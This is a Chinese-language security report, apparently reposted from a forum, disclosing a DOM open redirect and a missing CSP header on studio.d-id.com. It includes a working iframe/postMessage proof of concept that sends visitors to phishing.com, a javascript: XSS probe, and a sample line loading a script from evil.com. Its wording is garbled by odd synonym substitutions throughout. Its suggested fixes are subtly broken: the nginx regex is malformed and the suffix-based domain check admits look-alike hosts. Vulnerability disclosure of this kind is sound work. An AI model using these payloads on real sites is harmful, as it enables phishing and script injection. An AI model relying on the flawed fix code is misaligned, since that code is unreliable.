安全漏洞验证陈诉
安全漏洞验证陈诉目的体系:https://studio.d-id.com
测试时间:2025-02-22
陈诉版本:2.0
发现者:Neatsuki
漏洞概览
漏洞类型风险品级CVSS 3.1CWE-ID状态DOM型开放重定向高危7.1CWE-601未修复CSP战略缺失中危5.5CWE-16未修复 漏洞详情
1. DOM型开放重定向
漏洞描述
前端代码未对 redirect 参数的目的域名进行校验,导致攻击者可通过构造恶意链接或结合 postMessage 跨域消息触发恣意域名跳转。
复现步骤
[*]构造恶意页面:<iframe id="malicious-iframe" src="https://studio.d-id.com"></iframe>
<script>
setTimeout(() => {
document.getElementById("malicious-iframe").contentWindow.postMessage({
type: "redirect",
url: "https://studio.d-id.com/?redirect=https://phishing.com
"
}, "*");
}, 3000);
</script>
[*]用户访问恶意页面:
等候3秒后,主页面主动跳转至 https://phishing.com。
影响证明
[*]网络哀求跟踪:GET /?redirect=https://phishing.com HTTP/2
Host: studio.d-id.com
- **浏览器控制台日志**:
```javascript
> window.location.href
< "https://phishing.com"
2. CSP战略缺失
漏洞描述
目的体系未设置 Content-Security-Policy 响应头,允许攻击者注入外部脚本或通过内联脚本实行恶意代码。
复现步骤
[*]发送HTTP哀求验证CSP头:curl -I https://studio.d-id.com | grep "Content-Security-Policy"
# 无返回结果
[*]构造XSS测试Payload:history.replaceState(null, null, '?redirect=javascript:alert(document.domain)');
location.reload();
结果:
[*]浏览器拦截 javascript: 协议实行,但若存在其他注入点(如动态脚本加载),风险仍存在。
影响证明
[*]潜在攻击场景:
若存在其他未过滤的输入点(如动态加载脚本),攻击者可注入:<script src="https://evil.com/exploit.js"></script>
修复发起
1. DOM型开放重定向
前端修复
const ALLOWED_DOMAINS = ["d-id.com", "trusted.com"];
const ALLOWED_PROTOCOLS = ["http:", "https:"];
function safeRedirect(url) {
try {
const target = new URL(url, window.location.origin);
if (
!ALLOWED_PROTOCOLS.includes(target.protocol) ||
!ALLOWED_DOMAINS.some(domain => target.hostname.endsWith(domain))
) {
throw new Error("非法重定向目标");
}
window.location.href = target.href;
} catch (error) {
console.error("安全拦截:", error.message);
history.replaceState(null, "", window.location.pathname);
}
}
// 调用示例
const redirectParam = new URLSearchParams(location.search).get("redirect");
if (redirectParam) safeRedirect(redirectParam);
服务端修复
# 拦截非法域名和协议
if ($arg_redirect !~* "^https?:\/\/(+\.)?d-id\.com") {
return 403;
}
2. CSP战略缺失
设置强制CSP头
Content-Security-Policy:
default-src 'none';
script-src 'self' 'nonce-{RANDOM}';
style-src 'self' 'unsafe-inline';
img-src 'self' data:;
connect-src 'self';
form-action 'self';
navigate-to 'self' https://*.d-id.com;
report-uri /csp-report;
漏洞验证阐明
[*] 开放重定向复测:
访问修复后的链接应保持当前页面:
https://studio.d-id.com/?redirect=https://phishing.com
控制台需显示拦截日记:
安全拦截: 非法重定向目标
[*] CSP见效验证:
curl -I https://studio.d-id.com | grep "Content-Security-Policy"
# 应返回配置的CSP头
附录
测试工具与参考
工具/标准用途Burp Suite Pro流量截获与漏洞验证OWASP ZAP主动化扫描OWASP Top 10漏洞分类参考 陈诉编制:Neatsuki
审核:null
发布日期:2025-02-23
此陈诉仅包罗已验证成功的漏洞,全部修复发起均基于实际复现结果。发起在 48小时内 完成高危漏洞修复,并通过第三方渗出测试确认修复效果。
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!更多信息从访问主页:qidao123.com:ToB企服之家,中国第一个企服评测及商务社交产业平台。
页:
[1]